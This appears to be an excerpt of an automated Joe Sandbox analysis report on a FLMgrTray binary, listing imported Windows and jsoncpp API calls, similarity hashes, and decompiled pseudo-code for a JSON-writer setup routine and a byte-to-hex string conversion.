                                                                                        • TlsAlloc.KERNEL32 ref: 001611C7
                                                                                        • GetLastError.KERNEL32 ref: 001611D5
                                                                                        • TlsAlloc.KERNEL32(00000000,tss), ref: 00161227
                                                                                        • GetLastError.KERNEL32 ref: 00161235
                                                                                        • TlsAlloc.KERNEL32(00000000,?,?,tss), ref: 00161287
                                                                                        • GetLastError.KERNEL32(?,?,?,tss), ref: 00161295
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocErrorLast
                                                                                        • String ID: tss
                                                                                        • API String ID: 4252645092-1638339373
                                                                                        • Opcode ID: 7570abce085a4e00b34f71ad03b6a3d6bda4aa58df5a55ac771b49accc76f52c
                                                                                        • Instruction ID: b0eb4719ce5f7c4fdca3243d32a55ed5140103f640560b4fcc2fd8f907d7ec0c
                                                                                        • Opcode Fuzzy Hash: 7570abce085a4e00b34f71ad03b6a3d6bda4aa58df5a55ac771b49accc76f52c
                                                                                        • Instruction Fuzzy Hash: AE212932D01218BBCB10BBB8BC4A89D76AD9B60B71B240666FD0593281EBB047434BD2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 55%
                                                                                        			E001770A0(intOrPtr _a4) {
                                                                                        				intOrPtr _v8;
                                                                                        				char _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				char _v44;
                                                                                        				signed int _t13;
                                                                                        				intOrPtr _t26;
                                                                                        				signed int _t28;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018DBF1);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t13 =  *0x19d05c; // 0x2c80d730
                                                                                        				_push(_t13 ^ _t28);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_v20 = 0;
                                                                                        				_t26 = _a4;
                                                                                        				_push(0);
                                                                                        				_v8 = 0;
                                                                                        				L00176836();
                                                                                        				_push(_t26);
                                                                                        				_v8 = 0;
                                                                                        				_v20 = 1;
                                                                                        				L0018CA48();
                                                                                        				_push(1);
                                                                                        				L00176848();
                                                                                        				_v8 = 1;
                                                                                        				_push( &_v44);
                                                                                        				_push("emitUTF8");
                                                                                        				L00176866();
                                                                                        				L0017685A();
                                                                                        				L00176854();
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return _t26;
                                                                                        			}










                                                                                        0x001770a3
                                                                                        0x001770a5
                                                                                        0x001770b0
                                                                                        0x001770b5
                                                                                        0x001770bc
                                                                                        0x001770c0
                                                                                        0x001770c6
                                                                                        0x001770cd
                                                                                        0x001770d2
                                                                                        0x001770d4
                                                                                        0x001770db
                                                                                        0x001770e0
                                                                                        0x001770e1
                                                                                        0x001770e8
                                                                                        0x001770ef
                                                                                        0x001770fa
                                                                                        0x001770fc
                                                                                        0x00177104
                                                                                        0x0017710b
                                                                                        0x0017710c
                                                                                        0x00177113
                                                                                        0x0017711a
                                                                                        0x00177122
                                                                                        0x0017712c
                                                                                        0x00177138

                                                                                        APIs
                                                                                        • ??0Value@Json@@QAE@W4ValueType@1@@Z.JSONCPP(00000000,2C80D730,00000000,?,00000000,0018DBF1), ref: 001770DB
                                                                                        • ?setDefaults@StreamWriterBuilder@Json@@SAXPAVValue@2@@Z.JSONCPP(0017FF79,00000000,2C80D730,00000000,?,00000000,0018DBF1), ref: 001770EF
                                                                                        • ??0Value@Json@@QAE@_N@Z.JSONCPP(00000001,00000000,?,00000000,0018DBF1), ref: 001770FC
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(emitUTF8,?,00000001,00000000,?,00000000,0018DBF1), ref: 00177113
                                                                                        • ??4Value@Json@@QAEAAV01@$$QAV01@@Z.JSONCPP(emitUTF8,?,00000001,00000000,?,00000000,0018DBF1), ref: 0017711A
                                                                                        • ??1Value@Json@@QAE@XZ.JSONCPP(emitUTF8,?,00000001,00000000,?,00000000,0018DBF1), ref: 00177122
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Json@@$Value@$?setBuilder@Defaults@StreamType@1@@V01@V01@$$V01@@ValueValue@2@@Writer
                                                                                        • String ID: emitUTF8
                                                                                        • API String ID: 4058447130-765881839
                                                                                        • Opcode ID: f65362d63d15948e279b3ee756effd8f216d6a43d8ecc5bdcf79521ddbada953
                                                                                        • Instruction ID: cfc9b0a5d77059473370e524d3754241dcde7f0583fd8add63dede10b5e48d75
                                                                                        • Opcode Fuzzy Hash: f65362d63d15948e279b3ee756effd8f216d6a43d8ecc5bdcf79521ddbada953
                                                                                        • Instruction Fuzzy Hash: 6F018871E00758ABDB00EF94C952BDEBBB8EB18710F004159F815A77C1DBB55A44CBD2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00186247,?,?,?,?), ref: 00187457
                                                                                        • _invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00186247,?,?,?,?), ref: 00187463
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _errno_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 2959964966-0
                                                                                        • Opcode ID: 540f3c140c4bda42ce9666d687bbcdaec72405069e68ca8acb6203512746433d
                                                                                        • Instruction ID: 9c4062c1825d6053a08f14693bf97d03c49c0ebe605c55298e668d6945283182
                                                                                        • Opcode Fuzzy Hash: 540f3c140c4bda42ce9666d687bbcdaec72405069e68ca8acb6203512746433d
                                                                                        • Instruction Fuzzy Hash: D9115A362042145BDB106BA9FC486ABBB9CEB99361F000036FA0CC2651D7359A548BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 33%
                                                                                        			E0016A2E0(void* __ebx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                        				struct _IO_FILE* _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v17;
                                                                                        				signed int _v24;
                                                                                        				void _v28;
                                                                                        				void* _v32;
                                                                                        				struct _IO_FILE* _v36;
                                                                                        				signed int _v40;
                                                                                        				signed int _t120;
                                                                                        				void* _t124;
                                                                                        				unsigned int _t126;
                                                                                        				signed int _t142;
                                                                                        				signed int _t154;
                                                                                        				void* _t163;
                                                                                        				void* _t164;
                                                                                        				void _t166;
                                                                                        				void* _t173;
                                                                                        				void* _t174;
                                                                                        				void _t176;
                                                                                        				signed char _t196;
                                                                                        				signed int _t198;
                                                                                        				void* _t199;
                                                                                        				signed int _t201;
                                                                                        				void* _t202;
                                                                                        				void* _t203;
                                                                                        				void _t205;
                                                                                        				void* _t206;
                                                                                        				unsigned int _t208;
                                                                                        				void* _t209;
                                                                                        				signed char _t215;
                                                                                        				intOrPtr _t219;
                                                                                        				intOrPtr _t220;
                                                                                        				void* _t221;
                                                                                        				unsigned int _t226;
                                                                                        				void* _t227;
                                                                                        				void* _t235;
                                                                                        				void* _t243;
                                                                                        				unsigned int _t250;
                                                                                        				signed int _t252;
                                                                                        				void* _t253;
                                                                                        				void* _t254;
                                                                                        				void* _t257;
                                                                                        				void* _t261;
                                                                                        				signed int _t264;
                                                                                        				void _t267;
                                                                                        				signed int _t269;
                                                                                        				void* _t271;
                                                                                        				signed char _t273;
                                                                                        				signed int _t278;
                                                                                        				void* _t279;
                                                                                        				void* _t282;
                                                                                        				void* _t283;
                                                                                        				void* _t285;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018D269);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t279 = _t278 - 0x18;
                                                                                        				_t120 =  *0x19d05c; // 0x2c80d730
                                                                                        				_push(_t120 ^ _t278);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_v36 = 0;
                                                                                        				_t271 = _a4;
                                                                                        				 *(_t271 + 0x10) = 0;
                                                                                        				 *(_t271 + 0x14) = 0xf;
                                                                                        				 *_t271 = 0;
                                                                                        				_t257 =  *(_t271 + 0x10);
                                                                                        				_v8 = 0;
                                                                                        				_v36 = 1;
                                                                                        				_t252 = _a12 + _a12;
                                                                                        				_v24 = _t257;
                                                                                        				if(_t257 > _t252) {
                                                                                        					L19:
                                                                                        					_t124 = 0;
                                                                                        					_v32 = 0;
                                                                                        					if(_a12 <= 0) {
                                                                                        						L68:
                                                                                        						 *[fs:0x0] = _v16;
                                                                                        						return _t271;
                                                                                        					} else {
                                                                                        						do {
                                                                                        							_t257 = _t257 | 0xffffffff;
                                                                                        							_t252 =  *(_t271 + 0x10);
                                                                                        							_v24 = _t252;
                                                                                        							_t126 =  *(_t124 + _a8) & 0x000000ff;
                                                                                        							_v40 = _t126 & 0x0000000f;
                                                                                        							_t215 =  *(_t271 + 0x14);
                                                                                        							_t196 =  *((intOrPtr*)((_t126 >> 4) + "0123456789abcdef"));
                                                                                        							_v17 = _t196;
                                                                                        							_v28 = _t215;
                                                                                        							if(_t215 - _t252 < 1) {
                                                                                        								if(0x7fffffff - _t252 < 1) {
                                                                                        									goto L69;
                                                                                        								} else {
                                                                                        									_t45 = 1 + _t252; // 0x1
                                                                                        									_t198 = _t45 | 0x0000000f;
                                                                                        									if(_t198 <= 0x7fffffff) {
                                                                                        										_t264 = _t215 >> 1;
                                                                                        										if(_t215 <= 0x7fffffff - _t264) {
                                                                                        											_t199 =  <  ? _t215 + _t264 : _t198;
                                                                                        										} else {
                                                                                        											_t199 = 0x7fffffff;
                                                                                        										}
                                                                                        										_t257 = _t264 | 0xffffffff;
                                                                                        									} else {
                                                                                        										_t199 = 0x7fffffff;
                                                                                        									}
                                                                                        									_t47 = _t199 + 1; // 0x80000000
                                                                                        									_t221 = _t47;
                                                                                        									if(_t221 < 0x1000) {
                                                                                        										if(_t221 == 0) {
                                                                                        											_t257 = 0;
                                                                                        										} else {
                                                                                        											_push(_t221);
                                                                                        											_t173 = E00175703();
                                                                                        											_t252 = _v24;
                                                                                        											_t279 = _t279 + 4;
                                                                                        											_t257 = _t173;
                                                                                        										}
                                                                                        										goto L37;
                                                                                        									} else {
                                                                                        										_t48 = _t221 + 0x23; // 0x80000023
                                                                                        										_t174 = _t48;
                                                                                        										_t175 =  <=  ? _t257 : _t174;
                                                                                        										_push( <=  ? _t257 : _t174);
                                                                                        										_t176 = E00175703();
                                                                                        										_t279 = _t279 + 4;
                                                                                        										if(_t176 == 0) {
                                                                                        											goto L14;
                                                                                        										} else {
                                                                                        											_t252 = _v24;
                                                                                        											_t50 = _t176 + 0x23; // 0x23
                                                                                        											_t257 = _t50 & 0xffffffe0;
                                                                                        											 *(_t257 - 4) = _t176;
                                                                                        											L37:
                                                                                        											_t54 = 1 + _t252; // 0x1
                                                                                        											 *(_t271 + 0x10) = _t54;
                                                                                        											 *(_t271 + 0x14) = _t199;
                                                                                        											_push(_t252);
                                                                                        											if(_v28 < 0x10) {
                                                                                        												memcpy(_t257, _t271, ??);
                                                                                        												_t279 = _t279 + 0xc;
                                                                                        												_t142 = _v24;
                                                                                        												 *((char*)(_t257 + _t142)) = _v17 << 0x00000008 | _v17 & 0x000000ff;
                                                                                        												 *((char*)(_t257 + _t142 + 1)) = 0;
                                                                                        												goto L43;
                                                                                        											} else {
                                                                                        												_t206 =  *_t271;
                                                                                        												memcpy(_t257, _t206, ??);
                                                                                        												_t282 = _t279 + 0xc;
                                                                                        												_t171 = _v24;
                                                                                        												 *((char*)(_t257 + _t171)) = _v17 << 0x00000008 | _v17 & 0x000000ff;
                                                                                        												_t243 = 1 + _v28;
                                                                                        												 *((char*)(_t257 + _t171 + 1)) = 0;
                                                                                        												if(_t243 < 0x1000) {
                                                                                        													L41:
                                                                                        													_push(_t243);
                                                                                        													E00175733(_t171, _t206);
                                                                                        													_t279 = _t282 + 8;
                                                                                        													L43:
                                                                                        													 *_t271 = _t257;
                                                                                        													goto L44;
                                                                                        												} else {
                                                                                        													_t254 =  *(_t206 - 4);
                                                                                        													_t235 = _t243 + 0x23;
                                                                                        													_t64 = _t206 - _t254 - 4; // -3
                                                                                        													_t171 = _t64;
                                                                                        													if(_t64 > 0x1f) {
                                                                                        														goto L14;
                                                                                        													} else {
                                                                                        														_t206 = _t254;
                                                                                        														goto L41;
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t40 = 1 + _t252; // 0x1
                                                                                        								_t267 = _t271;
                                                                                        								 *(_t271 + 0x10) = _t40;
                                                                                        								if(_t215 >= 0x10) {
                                                                                        									_t267 =  *_t271;
                                                                                        								}
                                                                                        								 *((char*)(_t267 + _t252)) = _t196 << 0x00000008 | _t196 & 0x000000ff;
                                                                                        								 *((char*)(_t267 + 1 + _t252)) = 0;
                                                                                        								L44:
                                                                                        								_t257 =  *(_t271 + 0x14);
                                                                                        								_t252 =  *(_t271 + 0x10);
                                                                                        								_v24 = _t252;
                                                                                        								_t215 =  *((intOrPtr*)(_v40 + "0123456789abcdef"));
                                                                                        								_v17 = _t215;
                                                                                        								_v28 = _t257;
                                                                                        								if(_t257 - _t252 < 1) {
                                                                                        									if(0x7fffffff - _t252 < 1) {
                                                                                        										goto L69;
                                                                                        									} else {
                                                                                        										_t82 = 1 + _t252; // 0x1
                                                                                        										_t201 = _t82 | 0x0000000f;
                                                                                        										if(_t201 <= 0x7fffffff) {
                                                                                        											_t226 = _t257 >> 1;
                                                                                        											if(_t257 <= 0x7fffffff - _t226) {
                                                                                        												_t202 =  <  ? _t257 + _t226 : _t201;
                                                                                        											} else {
                                                                                        												_t202 = 0x7fffffff;
                                                                                        											}
                                                                                        										} else {
                                                                                        											_t202 = 0x7fffffff;
                                                                                        										}
                                                                                        										_t84 = _t202 + 1; // 0x80000000
                                                                                        										_t227 = _t84;
                                                                                        										if(_t227 < 0x1000) {
                                                                                        											if(_t227 == 0) {
                                                                                        												_t257 = 0;
                                                                                        											} else {
                                                                                        												_push(_t227);
                                                                                        												_t163 = E00175703();
                                                                                        												_t252 = _v24;
                                                                                        												_t279 = _t279 + 4;
                                                                                        												_t257 = _t163;
                                                                                        											}
                                                                                        											goto L60;
                                                                                        										} else {
                                                                                        											_t85 = _t227 + 0x23; // 0x80000023
                                                                                        											_t164 = _t85;
                                                                                        											_t235 = 0xffffffff;
                                                                                        											_t165 =  <=  ? 0xffffffff : _t164;
                                                                                        											_push( <=  ? 0xffffffff : _t164);
                                                                                        											_t166 = E00175703();
                                                                                        											_t279 = _t279 + 4;
                                                                                        											if(_t166 == 0) {
                                                                                        												goto L14;
                                                                                        											} else {
                                                                                        												_t252 = _v24;
                                                                                        												_t87 = _t166 + 0x23; // 0x23
                                                                                        												_t257 = _t87 & 0xffffffe0;
                                                                                        												 *(_t257 - 4) = _t166;
                                                                                        												L60:
                                                                                        												_t91 = 1 + _t252; // 0x1
                                                                                        												 *(_t271 + 0x10) = _t91;
                                                                                        												 *(_t271 + 0x14) = _t202;
                                                                                        												_push(_t252);
                                                                                        												if(_v28 < 0x10) {
                                                                                        													memcpy(_t257, _t271, ??);
                                                                                        													_t279 = _t279 + 0xc;
                                                                                        													_t154 = _v24;
                                                                                        													 *((char*)(_t257 + _t154)) = _v17 << 0x00000008 | _v17 & 0x000000ff;
                                                                                        													 *((char*)(_t257 + _t154 + 1)) = 0;
                                                                                        													goto L66;
                                                                                        												} else {
                                                                                        													_t203 =  *_t271;
                                                                                        													memcpy(_t257, _t203, ??);
                                                                                        													_t283 = _t279 + 0xc;
                                                                                        													_t158 = _v24;
                                                                                        													 *((char*)(_t257 + _t158)) = _v17 << 0x00000008 | _v17 & 0x000000ff;
                                                                                        													_t235 = 1 + _v28;
                                                                                        													 *((char*)(_t257 + _t158 + 1)) = 0;
                                                                                        													if(_t235 < 0x1000) {
                                                                                        														L64:
                                                                                        														_push(_t235);
                                                                                        														E00175733(_t158, _t203);
                                                                                        														_t279 = _t283 + 8;
                                                                                        														L66:
                                                                                        														 *_t271 = _t257;
                                                                                        														goto L67;
                                                                                        													} else {
                                                                                        														_t253 =  *(_t203 - 4);
                                                                                        														_t235 = _t235 + 0x23;
                                                                                        														_t101 = _t203 - _t253 - 4; // -3
                                                                                        														_t158 = _t101;
                                                                                        														if(_t101 > 0x1f) {
                                                                                        															goto L14;
                                                                                        														} else {
                                                                                        															_t203 = _t253;
                                                                                        															goto L64;
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								} else {
                                                                                        									_t77 = 1 + _t252; // 0x1
                                                                                        									_t205 = _t271;
                                                                                        									 *(_t271 + 0x10) = _t77;
                                                                                        									if(_t257 >= 0x10) {
                                                                                        										_t205 =  *_t271;
                                                                                        									}
                                                                                        									 *((char*)(_t205 + _t252)) = _t215 << 0x00000008 | _t215 & 0x000000ff;
                                                                                        									 *((char*)(_t205 + 1 + _t252)) = 0;
                                                                                        									goto L67;
                                                                                        								}
                                                                                        							}
                                                                                        							goto L74;
                                                                                        							L67:
                                                                                        							_t124 = _v32 + 1;
                                                                                        							_v32 = _t124;
                                                                                        						} while (_t124 < _a12);
                                                                                        						goto L68;
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t208 =  *(_t271 + 0x14);
                                                                                        					_t285 = _t208 - _t252;
                                                                                        					if(_t285 == 0) {
                                                                                        						goto L19;
                                                                                        					} else {
                                                                                        						if(_t285 >= 0) {
                                                                                        							if(_t252 < 0x10 && _t208 >= 0x10) {
                                                                                        								E00166160(_t271);
                                                                                        							}
                                                                                        							goto L19;
                                                                                        						} else {
                                                                                        							_t215 = _t252 - _t257;
                                                                                        							if(0x7fffffff - _t257 < _t215) {
                                                                                        								L69:
                                                                                        								E001631F0(_t252);
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								_push(_t271);
                                                                                        								_t273 = _t215;
                                                                                        								_push(_t257);
                                                                                        								if( *(_t273 + 0x4c) != 0) {
                                                                                        									E0016A220(_t215);
                                                                                        									_t260 =  ==  ? 0 : _t273;
                                                                                        									fclose( *(_t273 + 0x4c));
                                                                                        									_t261 =  !=  ? 0 :  ==  ? 0 : _t273;
                                                                                        								} else {
                                                                                        									_t261 = 0;
                                                                                        								}
                                                                                        								 *((char*)(_t273 + 0x48)) = 0;
                                                                                        								 *((char*)(_t273 + 0x3d)) = 0;
                                                                                        								__imp__?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ();
                                                                                        								 *(_t273 + 0x4c) = 0;
                                                                                        								_t219 =  *0x19db8c; // 0x0
                                                                                        								 *((intOrPtr*)(_t273 + 0x40)) = _t219;
                                                                                        								_t220 =  *0x19db90; // 0x0
                                                                                        								 *((intOrPtr*)(_t273 + 0x44)) = _t220;
                                                                                        								 *(_t273 + 0x38) = 0;
                                                                                        								return _t261;
                                                                                        							} else {
                                                                                        								_t269 = _t252 | 0x0000000f;
                                                                                        								if(_t269 <= 0x7fffffff) {
                                                                                        									_t250 = _t208 >> 1;
                                                                                        									if(_t208 <= 0x7fffffff - _t250) {
                                                                                        										_t257 =  <  ? _t208 + _t250 : _t269;
                                                                                        									} else {
                                                                                        										_t257 = 0x7fffffff;
                                                                                        									}
                                                                                        								} else {
                                                                                        									_t257 = 0x7fffffff;
                                                                                        								}
                                                                                        								_t14 = _t257 + 1; // 0x80000000
                                                                                        								_t235 = E00163200(_t252, _t14);
                                                                                        								_v28 = _t235;
                                                                                        								 *(_t271 + 0x14) = _t257;
                                                                                        								 *(_t271 + 0x10) = _a12 + _a12;
                                                                                        								_push(1 + _v24);
                                                                                        								if(_t208 < 0x10) {
                                                                                        									L15:
                                                                                        									memcpy(_t235, _t271, ??);
                                                                                        									_t279 = _t279 + 0xc;
                                                                                        									 *_t271 = _v28;
                                                                                        									 *(_t271 + 0x10) = _v24;
                                                                                        								} else {
                                                                                        									_t257 =  *_t271;
                                                                                        									_t190 = memcpy(_t235, _t257, ??);
                                                                                        									_t209 = 1 + _t208;
                                                                                        									_t279 = _t279 + 0xc;
                                                                                        									if(_t209 < 0x1000) {
                                                                                        										L13:
                                                                                        										_push(_t209);
                                                                                        										E00175733(_t190, _t257);
                                                                                        										_t279 = _t279 + 8;
                                                                                        										 *_t271 = _v28;
                                                                                        										 *(_t271 + 0x10) = _v24;
                                                                                        									} else {
                                                                                        										_t235 =  *(_t257 - 4);
                                                                                        										_t209 = _t209 + 0x23;
                                                                                        										_t257 = _t257 - _t235;
                                                                                        										_t22 = _t257 - 4; // 0x7ffffffb
                                                                                        										_t190 = _t22;
                                                                                        										if(_t22 > 0x1f) {
                                                                                        											L14:
                                                                                        											__imp___invalid_parameter_noinfo_noreturn();
                                                                                        											goto L15;
                                                                                        										} else {
                                                                                        											_t257 = _t235;
                                                                                        											goto L13;
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        								goto L19;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				L74:
                                                                                        			}
























































                                                                                        0x0016a2e3
                                                                                        0x0016a2e5
                                                                                        0x0016a2f0
                                                                                        0x0016a2f1
                                                                                        0x0016a2f7
                                                                                        0x0016a2fe
                                                                                        0x0016a302
                                                                                        0x0016a308
                                                                                        0x0016a30f
                                                                                        0x0016a312
                                                                                        0x0016a319
                                                                                        0x0016a320
                                                                                        0x0016a326
                                                                                        0x0016a329
                                                                                        0x0016a330
                                                                                        0x0016a337
                                                                                        0x0016a33a
                                                                                        0x0016a33f
                                                                                        0x0016a42d
                                                                                        0x0016a42d
                                                                                        0x0016a42f
                                                                                        0x0016a435
                                                                                        0x0016a71f
                                                                                        0x0016a724
                                                                                        0x0016a732
                                                                                        0x0016a43b
                                                                                        0x0016a43b
                                                                                        0x0016a43e
                                                                                        0x0016a441
                                                                                        0x0016a444
                                                                                        0x0016a447
                                                                                        0x0016a453
                                                                                        0x0016a456
                                                                                        0x0016a459
                                                                                        0x0016a463
                                                                                        0x0016a466
                                                                                        0x0016a46c
                                                                                        0x0016a4a1
                                                                                        0x00000000
                                                                                        0x0016a4a7
                                                                                        0x0016a4a7
                                                                                        0x0016a4aa
                                                                                        0x0016a4b3
                                                                                        0x0016a4c3
                                                                                        0x0016a4c9
                                                                                        0x0016a4d7
                                                                                        0x0016a4cb
                                                                                        0x0016a4cb
                                                                                        0x0016a4cb
                                                                                        0x0016a4da
                                                                                        0x0016a4b5
                                                                                        0x0016a4b5
                                                                                        0x0016a4b5
                                                                                        0x0016a4dd
                                                                                        0x0016a4dd
                                                                                        0x0016a4e6
                                                                                        0x0016a511
                                                                                        0x0016a523
                                                                                        0x0016a513
                                                                                        0x0016a513
                                                                                        0x0016a514
                                                                                        0x0016a519
                                                                                        0x0016a51c
                                                                                        0x0016a51f
                                                                                        0x0016a51f
                                                                                        0x00000000
                                                                                        0x0016a4e8
                                                                                        0x0016a4e8
                                                                                        0x0016a4e8
                                                                                        0x0016a4ed
                                                                                        0x0016a4f0
                                                                                        0x0016a4f1
                                                                                        0x0016a4f6
                                                                                        0x0016a4fb
                                                                                        0x00000000
                                                                                        0x0016a501
                                                                                        0x0016a501
                                                                                        0x0016a504
                                                                                        0x0016a507
                                                                                        0x0016a50a
                                                                                        0x0016a525
                                                                                        0x0016a529
                                                                                        0x0016a52c
                                                                                        0x0016a52f
                                                                                        0x0016a532
                                                                                        0x0016a533
                                                                                        0x0016a58a
                                                                                        0x0016a593
                                                                                        0x0016a5a0
                                                                                        0x0016a5a3
                                                                                        0x0016a5a6
                                                                                        0x00000000
                                                                                        0x0016a535
                                                                                        0x0016a535
                                                                                        0x0016a539
                                                                                        0x0016a542
                                                                                        0x0016a54f
                                                                                        0x0016a552
                                                                                        0x0016a558
                                                                                        0x0016a559
                                                                                        0x0016a564
                                                                                        0x0016a57c
                                                                                        0x0016a57c
                                                                                        0x0016a57e
                                                                                        0x0016a583
                                                                                        0x0016a5ab
                                                                                        0x0016a5ab
                                                                                        0x00000000
                                                                                        0x0016a566
                                                                                        0x0016a566
                                                                                        0x0016a569
                                                                                        0x0016a56e
                                                                                        0x0016a56e
                                                                                        0x0016a574
                                                                                        0x00000000
                                                                                        0x0016a57a
                                                                                        0x0016a57a
                                                                                        0x00000000
                                                                                        0x0016a57a
                                                                                        0x0016a574
                                                                                        0x0016a564
                                                                                        0x0016a533
                                                                                        0x0016a4fb
                                                                                        0x0016a4e6
                                                                                        0x0016a46e
                                                                                        0x0016a46e
                                                                                        0x0016a471
                                                                                        0x0016a473
                                                                                        0x0016a479
                                                                                        0x0016a47b
                                                                                        0x0016a47b
                                                                                        0x0016a48a
                                                                                        0x0016a48d
                                                                                        0x0016a5ad
                                                                                        0x0016a5b0
                                                                                        0x0016a5b3
                                                                                        0x0016a5b6
                                                                                        0x0016a5b9
                                                                                        0x0016a5c3
                                                                                        0x0016a5c6
                                                                                        0x0016a5cc
                                                                                        0x0016a601
                                                                                        0x00000000
                                                                                        0x0016a607
                                                                                        0x0016a607
                                                                                        0x0016a60a
                                                                                        0x0016a613
                                                                                        0x0016a623
                                                                                        0x0016a629
                                                                                        0x0016a637
                                                                                        0x0016a62b
                                                                                        0x0016a62b
                                                                                        0x0016a62b
                                                                                        0x0016a615
                                                                                        0x0016a615
                                                                                        0x0016a615
                                                                                        0x0016a63a
                                                                                        0x0016a63a
                                                                                        0x0016a643
                                                                                        0x0016a673
                                                                                        0x0016a685
                                                                                        0x0016a675
                                                                                        0x0016a675
                                                                                        0x0016a676
                                                                                        0x0016a67b
                                                                                        0x0016a67e
                                                                                        0x0016a681
                                                                                        0x0016a681
                                                                                        0x00000000
                                                                                        0x0016a645
                                                                                        0x0016a645
                                                                                        0x0016a645
                                                                                        0x0016a64a
                                                                                        0x0016a64f
                                                                                        0x0016a652
                                                                                        0x0016a653
                                                                                        0x0016a658
                                                                                        0x0016a65d
                                                                                        0x00000000
                                                                                        0x0016a663
                                                                                        0x0016a663
                                                                                        0x0016a666
                                                                                        0x0016a669
                                                                                        0x0016a66c
                                                                                        0x0016a687
                                                                                        0x0016a68b
                                                                                        0x0016a68e
                                                                                        0x0016a691
                                                                                        0x0016a694
                                                                                        0x0016a695
                                                                                        0x0016a6ec
                                                                                        0x0016a6f5
                                                                                        0x0016a702
                                                                                        0x0016a705
                                                                                        0x0016a708
                                                                                        0x00000000
                                                                                        0x0016a697
                                                                                        0x0016a697
                                                                                        0x0016a69b
                                                                                        0x0016a6a4
                                                                                        0x0016a6b1
                                                                                        0x0016a6b4
                                                                                        0x0016a6ba
                                                                                        0x0016a6bb
                                                                                        0x0016a6c6
                                                                                        0x0016a6de
                                                                                        0x0016a6de
                                                                                        0x0016a6e0
                                                                                        0x0016a6e5
                                                                                        0x0016a70d
                                                                                        0x0016a70d
                                                                                        0x00000000
                                                                                        0x0016a6c8
                                                                                        0x0016a6c8
                                                                                        0x0016a6cb
                                                                                        0x0016a6d0
                                                                                        0x0016a6d0
                                                                                        0x0016a6d6
                                                                                        0x00000000
                                                                                        0x0016a6dc
                                                                                        0x0016a6dc
                                                                                        0x00000000
                                                                                        0x0016a6dc
                                                                                        0x0016a6d6
                                                                                        0x0016a6c6
                                                                                        0x0016a695
                                                                                        0x0016a65d
                                                                                        0x0016a643
                                                                                        0x0016a5ce
                                                                                        0x0016a5ce
                                                                                        0x0016a5d1
                                                                                        0x0016a5d3
                                                                                        0x0016a5d9
                                                                                        0x0016a5db
                                                                                        0x0016a5db
                                                                                        0x0016a5ea
                                                                                        0x0016a5ed
                                                                                        0x00000000
                                                                                        0x0016a5ed
